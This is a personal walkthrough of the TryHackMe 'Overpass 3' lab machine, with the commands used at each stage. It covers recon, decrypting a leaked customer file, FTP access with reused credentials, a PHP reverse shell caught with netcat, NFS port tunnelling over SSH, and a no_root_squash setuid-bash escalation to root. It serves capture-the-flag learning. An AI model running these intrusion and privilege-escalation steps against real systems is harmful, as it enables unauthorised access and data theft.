Skip to main content

Overpass 3 - Hosting

This is my write-up for the TryHackMe machine at: https://tryhackme.com/room/overpass3hosting

Nmap Scan command:

nmap -T4 -A 10.10.168.65 -oN nmapscan

Nmap output:

Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-10 22:39 EDT
Nmap scan report for 10.10.168.65
Host is up (0.62s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
| 3072 de:5b:0e:b5:40:aa:43:4d:2a:83:31:14:20:77:9c:a1 (RSA)
| 256 f4:b5:a6:60:f4:d1:bf:e2:85:2e:2e:7e:5f:4c:ce:38 (ECDSA)
|_ 256 29:e6:61:09:ed:8a:88:2b:55:74:f2:b7:33:ae:df:c8 (ED25519)
80/tcp open http Apache httpd 2.4.37 ((centos))
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.37 (centos)
|_http-title: Overpass Hosting
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 50.91 seconds

I noticed that they have 3 ports open. I went to the web (port 80) first to check it out:

There was no /robots.txt file. I then ran gobuster on the IP address:

gobuster dir --url http://10.10.168.65/  -w directory-list-lowercase-2.3-big.txt -t 40

About 4% of the gobuster search, I got the following output:

Going to the backups website, I saw this:

I then downloaded the file. There were two files in the zip file:

Using this write-up, I realized that I can decrupt the file with the private key I have:

gpg --import priv.key //import the key
gpg --decrypt CustomerDetails.xlsx.gpg > CustomerDetails.xlsx //output to new file

Since I am on Linux (Kali), I wanted to convert the file to a version that I would be able to view in. I ran the following command to convert the Excel file into a csv file, which I was able to read:

ssconvert CustomerDetails.xlsx newfile.csv

I was then able to see the contents of the file:

It seems to be the customers of the website, based on the context. We also have their username and password. I will try this in FTP, and my plan is that if the password does not work on FTP, then I will try SSH. In FTP, I got access using the credentials for "Par. A. Doxx":

FTP seemed to only work for that user. The other passwords did not work in FTP. When I tried for SSH, the credentials did not work there either. I then went back to the same write-up above and then realized that I had to upload a php-reverse-shell. Going to this GitHub page, I downloaded the reverse-shell script. In the script, I changed the IP address to my TryHackMe IP address. I then uploaded the file to the server:

I then ran nc -lvp 1234 on another terminal tab, and was listening for a connection. After visiting http://10.10.168.65/php-reverse-shell.php, I got a reverse shell:

After being stuck for a while, I viewed this write-up in order to see where to go next. I used the command the author of the write-up used:

find / -type f -name "*flag*" -exec ls -l {} + 2>/dev/null

This gave me the following output:

This file had the flag in it:

I then downloaded Linpeas to my local machine using wget. I then pushed that to the server using an http server:

I then ran linpeas on the remote machine. I then saw the following, when I also saw in other write-ups as well:

I then went back to the most recently mentioned write-up, in order to understand what I had to do next. Following this write-up, I uploaded my key to the remote server so I can connect in an easier method. Here are the commands I ran:

My machine: ssh-keygen -f paradox
My machine: cat paradox.pub
//Take the information inside the paradox.pub and copy it to the remote machine
Remote machine: echo "ssh-rsa ............" > .ssh/paradox

I was then able to ssh into the machine to the user paradox from my machine directly:

After a long time of being stuck, I finally found a solution reading this write-up. My mistake was running the wrong command. The following is what worked for me:

ssh -i paradox -L 20049:127.0.0.1:2049  paradox@10.10.168.65

I changed 2049 before the IP to 20049, since I kept on getting errors that the port was already in use. I then ran the following command to mount the share to my local machine:

sudo mount -t nfs -o port=20049 localhost: nfs

If we change directory into the nfs folder, we can see the file system mounted there:

I read the user flag. After that, the ssh authorized key I had uploaded to paradox earlier, I had not uploaded it to .ssh/authorized_keys in the mounted directory. I then was able to SSH to the machine:

I read up from this write-up that I can now use the no_root_squash exploit, something that linpeas.sh had shown us earlier. I followed the following commands from the write-up to get it to work:

#In the mounted dir, as root user
cp /bin/bash ./
chmod +s bash

#In the remote machine as user james
./bash -p

This got me root user on the machine. I then got the root flag.